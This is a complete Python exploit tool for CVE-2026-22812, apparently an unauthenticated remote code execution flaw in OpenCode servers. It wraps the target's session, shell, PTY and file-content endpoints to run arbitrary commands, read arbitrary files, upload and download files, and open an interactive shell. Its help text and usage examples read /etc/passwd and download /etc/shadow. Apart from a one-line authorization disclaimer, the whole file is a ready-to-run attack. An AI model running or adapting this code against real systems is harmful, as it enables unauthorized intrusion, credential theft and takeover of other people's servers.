#!/usr/bin/env python3
"""Command-line client for testing CVE-2026-22812 against an OpenCode server.

The tool talks to the target's HTTP API (``/session``,
``/session/<id>/shell``, ``/pty`` and ``/file/content``) and offers
one-shot actions as well as an interactive prompt.

Use only against systems you own or are explicitly authorized to test.
"""

import argparse
import base64
import json
import os
import readline  # noqa: F401 -- imported for its side effect on input() (line editing/history)
import sys
from datetime import datetime  # noqa: F401 -- kept from the original import list
from typing import Any, Dict, Optional
from urllib.parse import urlparse  # noqa: F401 -- kept from the original import list

import requests
import urllib3

# Every request below is sent with verify=False, so silence the warning
# urllib3 would otherwise print for each call.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class Colors:
    """ANSI escape sequences used to colorize terminal output."""

    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKCYAN = '\033[96m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


class OpenCodeExploit:
    """HTTP client wrapping the target's session, shell, PTY and file endpoints.

    Attributes:
        target: Base URL of the target with any trailing slash removed.
        timeout: Per-request timeout in seconds.
        session: Shared ``requests.Session`` (headers and optional proxy set).
        session_id: ID returned by ``create_session``, or None.
        pty_id: ID returned by ``create_pty``, or None.
        stats: Counters for commands executed, files read/written and errors.
    """

    def __init__(self, target: str, timeout: int = 10, proxy: Optional[str] = None):
        """Store connection settings and prepare the HTTP session.

        Args:
            target: Base URL of the target, e.g. ``http://192.168.1.10:4096``.
            timeout: Request timeout in seconds.
            proxy: Optional proxy URL applied to both http and https traffic.
        """
        self.target = target.rstrip('/')
        self.timeout = timeout
        self.session = requests.Session()
        self.session_id = None
        self.pty_id = None

        # Setup session
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
            'Content-Type': 'application/json',
        })

        # Setup proxy if provided
        if proxy:
            self.session.proxies = {
                'http': proxy,
                'https': proxy,
            }

        # Statistics
        self.stats = {
            'commands_executed': 0,
            'files_read': 0,
            'files_written': 0,
            'errors': 0,
        }

    @staticmethod
    def _output_text(result: Any) -> str:
        """Return the ``'output'`` field of a command result, else its str() form."""
        if isinstance(result, dict):
            return str(result.get('output') or result)
        return str(result)

    def log(self, message: str, level: str = "INFO"):
        """Print a colorized, prefixed log line.

        Unknown levels are printed without color and with a ``[?]`` prefix.
        """
        colors = {
            "INFO": Colors.OKBLUE,
            "SUCCESS": Colors.OKGREEN,
            "ERROR": Colors.FAIL,
            "WARNING": Colors.WARNING,
            "DEBUG": Colors.OKCYAN,
        }
        prefixes = {
            "INFO": "[*]",
            "SUCCESS": "[+]",
            "ERROR": "[-]",
            "WARNING": "[!]",
            "DEBUG": "[.]",
        }
        color = colors.get(level, "")
        prefix = prefixes.get(level, "[?]")
        print(f"{color}{prefix} {message}{Colors.ENDC}")

    def verify_target(self) -> bool:
        """Report whether a session can be created on the target.

        Returns:
            True if ``create_session`` returned an ID, False otherwise
            (including when any exception is raised).
        """
        try:
            self.log(f"Verifying target: {self.target}")

            # Try to create session
            session_id = self.create_session()
            if session_id:
                self.log("Target is VULNERABLE!", "SUCCESS")
                return True

            self.log("Target does not appear vulnerable", "ERROR")
            return False
        except Exception as e:
            self.log(f"Target verification failed: {str(e)}", "ERROR")
            return False

    def create_session(self) -> Optional[str]:
        """POST an empty JSON object to ``/session`` and remember the returned ID.

        Returns:
            The session ID on HTTP 200 with a JSON object containing ``id``;
            None on any other response or on a request error.
        """
        try:
            url = f"{self.target}/session"
            self.log("Creating session...", "INFO")

            response = self.session.post(
                url,
                json={},
                timeout=self.timeout,
                verify=False,
            )

            if response.status_code == 200:
                try:
                    data = response.json()
                except ValueError:
                    # Body was not JSON. ValueError is the common base of the
                    # decode errors requests can raise here.
                    data = None
                if isinstance(data, dict) and 'id' in data:
                    self.session_id = data['id']
                    self.log(f"Session created: {self.session_id}", "SUCCESS")
                    return self.session_id

            return None
        except requests.exceptions.RequestException as e:
            self.log(f"Session creation failed: {str(e)}", "ERROR")
            self.stats['errors'] += 1
            return None

    def execute_command(self, command: str, silent: bool = False) -> Optional[Dict]:
        """Send a shell command to ``/session/<id>/shell``.

        A session is created first if none exists yet.

        Args:
            command: Command string placed in the request payload.
            silent: When True, suppress log output for this call.

        Returns:
            The parsed JSON response for HTTP 200/201/202, or
            ``{"output": <body text>}`` when the body is not JSON.
            None if no session could be created, on any other status code,
            or on a request error.
        """
        if not self.session_id:
            if not self.create_session():
                return None

        try:
            if not silent:
                self.log(f"Executing: {command}")

            url = f"{self.target}/session/{self.session_id}/shell"
            payload = {
                "agent": "build",
                "command": command,
            }

            response = self.session.post(
                url,
                json=payload,
                timeout=self.timeout,
                verify=False,
            )

            self.stats['commands_executed'] += 1

            if response.status_code in [200, 201, 202]:
                if not silent:
                    self.log("Command executed successfully", "SUCCESS")
                try:
                    return response.json()
                except ValueError:
                    return {"output": response.text}

            if not silent:
                self.log(f"Command failed: HTTP {response.status_code}", "ERROR")
            self.stats['errors'] += 1
            return None
        except requests.exceptions.RequestException as e:
            if not silent:
                self.log(f"Execution error: {str(e)}", "ERROR")
            self.stats['errors'] += 1
            return None

    def create_pty(self) -> Optional[str]:
        """POST an empty JSON object to ``/pty``.

        Returns:
            The PTY ID from the response; the literal ``"default"`` when the
            request succeeded (HTTP 200/201) but no ID could be read from the
            body; None on any other status code or on a request error.
        """
        try:
            self.log("Creating PTY session...")

            url = f"{self.target}/pty"
            response = self.session.post(
                url,
                json={},
                timeout=self.timeout,
                verify=False,
            )

            if response.status_code in [200, 201]:
                try:
                    data = response.json()
                except ValueError:
                    # Non-JSON body: fall through to the "no ID" result.
                    data = None
                if isinstance(data, dict) and 'id' in data:
                    self.pty_id = data['id']
                    self.log(f"PTY created: {self.pty_id}", "SUCCESS")
                    return self.pty_id

                self.log("PTY created (no ID returned)", "SUCCESS")
                return "default"

            self.log(f"PTY creation failed: HTTP {response.status_code}", "ERROR")
            return None
        except requests.exceptions.RequestException as e:
            self.log(f"PTY error: {str(e)}", "ERROR")
            return None

    def read_file(self, filepath: str) -> Optional[str]:
        """GET ``/file/content?path=<filepath>`` and return the body text.

        Returns:
            The response text on HTTP 200, otherwise None.
        """
        try:
            self.log(f"Reading file: {filepath}")

            url = f"{self.target}/file/content"
            params = {"path": filepath}

            response = self.session.get(
                url,
                params=params,
                timeout=self.timeout,
                verify=False,
            )

            if response.status_code == 200:
                self.stats['files_read'] += 1
                self.log(f"File read successfully ({len(response.text)} bytes)", "SUCCESS")
                return response.text

            self.log(f"File read failed: HTTP {response.status_code}", "ERROR")
            self.stats['errors'] += 1
            return None
        except requests.exceptions.RequestException as e:
            self.log(f"File read error: {str(e)}", "ERROR")
            self.stats['errors'] += 1
            return None

    def write_file(self, filepath: str, content: str) -> bool:
        """Write ``content`` to ``filepath`` on the target via a shell command.

        The content is base64-encoded locally and decoded remotely, then the
        file's existence is checked with ``test -f``.

        Returns:
            True if the existence check response contains ``OK``, else False.
        """
        # NOTE(review): filepath is interpolated into the command string
        # unquoted, so paths containing spaces or shell metacharacters will
        # not behave as a single argument.
        try:
            self.log(f"Writing file: {filepath}")

            encoded = base64.b64encode(content.encode()).decode()
            command = f"echo {encoded} | base64 -d > {filepath}"

            result = self.execute_command(command, silent=True)
            if result:
                verify_cmd = f"test -f {filepath} && echo 'OK'"
                verify = self.execute_command(verify_cmd, silent=True)

                if verify and 'OK' in str(verify):
                    self.stats['files_written'] += 1
                    self.log("File written successfully", "SUCCESS")
                    return True

            self.log("File write failed", "ERROR")
            return False
        except Exception as e:
            self.log(f"File write error: {str(e)}", "ERROR")
            return False

    def upload_file(self, local_path: str, remote_path: str) -> bool:
        """Copy a local file to ``remote_path`` via base64 over shell commands.

        Payloads longer than 50000 base64 characters are appended in chunks
        to ``<remote_path>.b64`` and decoded at the end; smaller payloads are
        sent in a single command.

        Returns:
            True if the final ``ls -lh`` command returned a result, else False.
        """
        # NOTE(review): the final check only confirms that the ``ls -lh``
        # request itself returned a result; it does not inspect the output.
        # remote_path is also interpolated into shell strings unquoted.
        try:
            if not os.path.exists(local_path):
                self.log(f"Local file not found: {local_path}", "ERROR")
                return False

            self.log(f"Uploading: {local_path} -> {remote_path}")

            with open(local_path, 'rb') as f:
                content = f.read()

            encoded = base64.b64encode(content).decode()

            if len(encoded) > 50000:
                self.log("Large file, uploading in chunks...")
                chunk_size = 50000
                chunks = [encoded[i:i + chunk_size] for i in range(0, len(encoded), chunk_size)]

                self.execute_command(f"rm -f {remote_path}", silent=True)

                for i, chunk in enumerate(chunks):
                    cmd = f"echo {chunk} >> {remote_path}.b64"
                    if not self.execute_command(cmd, silent=True):
                        self.log(f"Upload failed at chunk {i+1}", "ERROR")
                        return False

                decode_cmd = f"base64 -d {remote_path}.b64 > {remote_path} && rm {remote_path}.b64"
                self.execute_command(decode_cmd, silent=True)
            else:
                command = f"echo {encoded} | base64 -d > {remote_path}"
                self.execute_command(command, silent=True)

            verify_cmd = f"ls -lh {remote_path}"
            result = self.execute_command(verify_cmd, silent=True)

            if result:
                self.log("Upload successful!", "SUCCESS")
                return True

            self.log("Upload verification failed", "ERROR")
            return False
        except Exception as e:
            self.log(f"Upload error: {str(e)}", "ERROR")
            return False

    def download_file(self, remote_path: str, local_path: str) -> bool:
        """Fetch ``remote_path`` with ``read_file`` and save it to ``local_path``.

        Returns:
            True if the file was read and written locally, else False.
        """
        # NOTE(review): content arrives as decoded text and is written in
        # text mode, so this is presumably only faithful for text files.
        try:
            self.log(f"Downloading: {remote_path} -> {local_path}")

            content = self.read_file(remote_path)
            # read_file returns None on failure; an empty string is a valid
            # (empty) file and must not be reported as a failed download.
            if content is not None:
                with open(local_path, 'w') as f:
                    f.write(content)

                self.log(f"Downloaded successfully ({len(content)} bytes)", "SUCCESS")
                return True

            self.log("Download failed", "ERROR")
            return False
        except Exception as e:
            self.log(f"Download error: {str(e)}", "ERROR")
            return False

    def get_system_info(self) -> Dict[str, str]:
        """Run a fixed set of informational commands and collect the results.

        Returns:
            Mapping from a label (``hostname``, ``username``, ...) to the
            stripped ``str()`` of each command's result. Commands that
            return nothing are omitted.
        """
        self.log("Gathering system information...")

        info = {}
        commands = {
            'hostname': 'hostname',
            'username': 'whoami',
            'user_id': 'id',
            'current_dir': 'pwd',
            'kernel': 'uname -a',
            'os_release': 'cat /etc/os-release 2>/dev/null | head -5',
            'ip_address': 'ip addr show 2>/dev/null | grep inet | head -5',
            'processes': 'ps aux | head -10',
        }

        for key, cmd in commands.items():
            result = self.execute_command(cmd, silent=True)
            if result:
                info[key] = str(result).strip()

        return info

    def interactive_shell(self):
        """Run a read-eval-print loop until ``exit`` or end of input.

        Built-in commands (``help``, ``read``, ``download``, ``upload``,
        ``sysinfo``, ``stats``, ``session``) are handled locally; any other
        input is passed to ``execute_command``.
        """
        if not self.session_id:
            if not self.create_session():
                return

        print(f"\n{Colors.OKGREEN}{Colors.BOLD}[*] Entering interactive shell mode{Colors.ENDC}")
        print(f"{Colors.WARNING}[!] Type 'help' for commands, 'exit' to quit{Colors.ENDC}\n")

        # Build the prompt from the commands' output text rather than from the
        # str() of the whole result dict.
        hostname_result = self.execute_command("hostname", silent=True)
        hostname = self._output_text(hostname_result).strip() if hostname_result else "target"

        username_result = self.execute_command("whoami", silent=True)
        username = self._output_text(username_result).strip() if username_result else "user"

        while True:
            try:
                prompt = f"{Colors.OKGREEN}{username}@{hostname}{Colors.ENDC}$ "
                cmd = input(prompt).strip()

                if not cmd:
                    continue

                if cmd.lower() == 'exit':
                    print(f"{Colors.WARNING}[*] Exiting...{Colors.ENDC}")
                    break

                elif cmd.lower() == 'help':
                    self.print_shell_help()
                    continue

                elif cmd.startswith('read '):
                    filepath = cmd[5:].strip()
                    content = self.read_file(filepath)
                    if content:
                        print(content)
                    continue

                elif cmd.startswith('download '):
                    parts = cmd.split()
                    if len(parts) >= 3:
                        self.download_file(parts[1], parts[2])
                    else:
                        print(f"{Colors.FAIL}[-] Usage: download <remote> <local>{Colors.ENDC}")
                    continue

                elif cmd.startswith('upload '):
                    parts = cmd.split()
                    if len(parts) >= 3:
                        self.upload_file(parts[1], parts[2])
                    else:
                        print(f"{Colors.FAIL}[-] Usage: upload <local> <remote>{Colors.ENDC}")
                    continue

                elif cmd == 'sysinfo':
                    info = self.get_system_info()
                    print(json.dumps(info, indent=2))
                    continue

                elif cmd == 'stats':
                    self.print_statistics()
                    continue

                elif cmd == 'session':
                    print(f"Session ID: {self.session_id}")
                    continue

                result = self.execute_command(cmd, silent=True)
                if result:
                    output = self._output_text(result)
                    if output and output != '{}':
                        print(output)

            except KeyboardInterrupt:
                print(f"\n{Colors.WARNING}[!] Interrupted. Type 'exit' to quit.{Colors.ENDC}")
            except EOFError:
                break
            except Exception as e:
                print(f"{Colors.FAIL}[-] Error: {str(e)}{Colors.ENDC}")

    def print_shell_help(self):
        """Print the list of commands understood by ``interactive_shell``."""
        help_text = f"""
{Colors.BOLD}Interactive Shell Commands:{Colors.ENDC}

{Colors.OKCYAN}Special Commands:{Colors.ENDC}
  help                        Show this help
  exit                        Exit interactive shell
  read <file>                 Read file content
  download <remote> <local>   Download file
  upload <local> <remote>     Upload file
  sysinfo                     Gather system information
  stats                       Show exploitation statistics
  session                     Show current session ID

{Colors.OKCYAN}Any other command:{Colors.ENDC}
  Will be executed as a shell command on the target

{Colors.WARNING}Examples:{Colors.ENDC}
  ls -la
  cat /etc/passwd
  read /etc/shadow
  download /etc/hosts ./hosts.txt
  upload shell.sh /tmp/shell.sh
"""
        print(help_text)

    def print_statistics(self):
        """Print the counters accumulated in ``self.stats``."""
        print(f"\n{Colors.BOLD}Exploitation Statistics:{Colors.ENDC}")
        print(f"  Commands Executed: {self.stats['commands_executed']}")
        print(f"  Files Read: {self.stats['files_read']}")
        print(f"  Files Written: {self.stats['files_written']}")
        print(f"  Errors: {self.stats['errors']}\n")


def print_banner():
    """Print the tool's boxed banner in bold red."""
    width = 64  # inner width of the box, excluding the border characters

    def row(text: str = "", centered: bool = False) -> str:
        # Pad every row to the same width so the right border lines up.
        body = text.center(width) if centered else f"    {text}".ljust(width)
        return f"║{body}║"

    lines = [
        "╔" + "═" * width + "╗",
        row(),
        row("CVE-2026-22812 Exploit Tool v1.0.0", centered=True),
        row("OpenCode Unauthenticated RCE Exploitation", centered=True),
        row(),
        row("Target: OpenCode < 1.0.216"),
        row("CVSS Score: 8.8 (High)"),
        row("Type: Unauthenticated Remote Code Execution"),
        row(),
        row("Author: @rohmatariow"),
        row("GitHub: github.com/rohmatariow/CVE-2026-22812-exploit"),
        row(),
        "╚" + "═" * width + "╝",
    ]
    box = "\n".join(lines)
    banner = f"\n{Colors.FAIL}{Colors.BOLD}\n{box}\n{Colors.ENDC}\n"
    print(banner)


def main():
    """Parse command-line arguments and run the selected action.

    With ``--verify`` or with no action flag, only the session check is
    performed and the process exits with status 0 (session created) or 1.
    Otherwise a session is created and exactly one action runs, chosen in
    this order: interactive, command, read, sysinfo, pty, upload, download.
    """
    print_banner()

    parser = argparse.ArgumentParser(
        description='CVE-2026-22812 Exploitation Tool',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=f"""
{Colors.BOLD}Examples:{Colors.ENDC}
  # Interactive shell
  python3 exploit.py -t http://192.168.1.10:4096 -i

  # Execute single command
  python3 exploit.py -t http://192.168.1.10:4096 -c "id"

  # Read file
  python3 exploit.py -t http://192.168.1.10:4096 -r /etc/passwd

  # Upload file
  python3 exploit.py -t http://192.168.1.10:4096 --upload shell.sh /tmp/shell.sh

  # Download file
  python3 exploit.py -t http://192.168.1.10:4096 --download /etc/shadow ./shadow.txt

  # Gather system info
  python3 exploit.py -t http://192.168.1.10:4096 --sysinfo

  # Use with proxy (Burp)
  python3 exploit.py -t http://target:4096 -c "id" --proxy http://127.0.0.1:8080
"""
    )

    parser.add_argument('-t', '--target', required=True,
                        help='Target URL (e.g., http://192.168.1.10:4096)')

    action_group = parser.add_mutually_exclusive_group()
    action_group.add_argument('-c', '--command',
                              help='Execute single command')
    action_group.add_argument('-r', '--read',
                              help='Read file')
    action_group.add_argument('-i', '--interactive', action='store_true',
                              help='Interactive shell mode')
    action_group.add_argument('--sysinfo', action='store_true',
                              help='Gather system information')
    action_group.add_argument('--pty', action='store_true',
                              help='Create PTY session')

    parser.add_argument('--upload', nargs=2, metavar=('LOCAL', 'REMOTE'),
                        help='Upload file: --upload local.txt /tmp/remote.txt')
    parser.add_argument('--download', nargs=2, metavar=('REMOTE', 'LOCAL'),
                        help='Download file: --download /etc/passwd ./passwd.txt')

    parser.add_argument('--timeout', type=int, default=10,
                        help='Request timeout in seconds (default: 10)')
    parser.add_argument('--proxy',
                        help='Proxy URL (e.g., http://127.0.0.1:8080)')
    parser.add_argument('--verify', action='store_true',
                        help='Only verify if target is vulnerable')

    args = parser.parse_args()

    try:
        exploit = OpenCodeExploit(
            target=args.target,
            timeout=args.timeout,
            proxy=args.proxy,
        )

        if args.verify or not any([args.command, args.read, args.interactive,
                                   args.sysinfo, args.pty, args.upload, args.download]):
            if exploit.verify_target():
                print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] Target is VULNERABLE to CVE-2026-22812!{Colors.ENDC}")
                print(f"{Colors.OKGREEN}[+] Session ID: {exploit.session_id}{Colors.ENDC}\n")
                sys.exit(0)
            else:
                print(f"\n{Colors.FAIL}[-] Target does not appear vulnerable{Colors.ENDC}\n")
                sys.exit(1)

        if not exploit.create_session():
            print(f"\n{Colors.FAIL}[-] Failed to create session. Target may not be vulnerable.{Colors.ENDC}\n")
            sys.exit(1)

        print(f"\n{Colors.OKGREEN}[+] Target is VULNERABLE!{Colors.ENDC}")
        print(f"{Colors.OKGREEN}[+] Session ID: {exploit.session_id}{Colors.ENDC}\n")

        if args.interactive:
            exploit.interactive_shell()

        elif args.command:
            result = exploit.execute_command(args.command)
            if result:
                # The parsed response is not guaranteed to be a JSON object.
                text = result.get('output') if isinstance(result, dict) else None
                output = text or json.dumps(result, indent=2)
                print(f"\n{output}\n")

        elif args.read:
            content = exploit.read_file(args.read)
            if content:
                print(f"\n{content}\n")

        elif args.sysinfo:
            info = exploit.get_system_info()
            print(f"\n{Colors.BOLD}System Information:{Colors.ENDC}")
            print(json.dumps(info, indent=2))
            print()

        elif args.pty:
            pty_id = exploit.create_pty()
            if pty_id:
                print(f"\n{Colors.OKGREEN}[+] PTY Session ID: {pty_id}{Colors.ENDC}\n")

        elif args.upload:
            exploit.upload_file(args.upload[0], args.upload[1])

        elif args.download:
            exploit.download_file(args.download[0], args.download[1])

        if exploit.stats['commands_executed'] > 0 or exploit.stats['files_read'] > 0:
            exploit.print_statistics()

    except KeyboardInterrupt:
        print(f"\n{Colors.WARNING}[!] Interrupted by user{Colors.ENDC}\n")
        sys.exit(130)
    except Exception as e:
        print(f"\n{Colors.FAIL}[-] Fatal error: {str(e)}{Colors.ENDC}\n")
        sys.exit(1)


if __name__ == "__main__":
    main()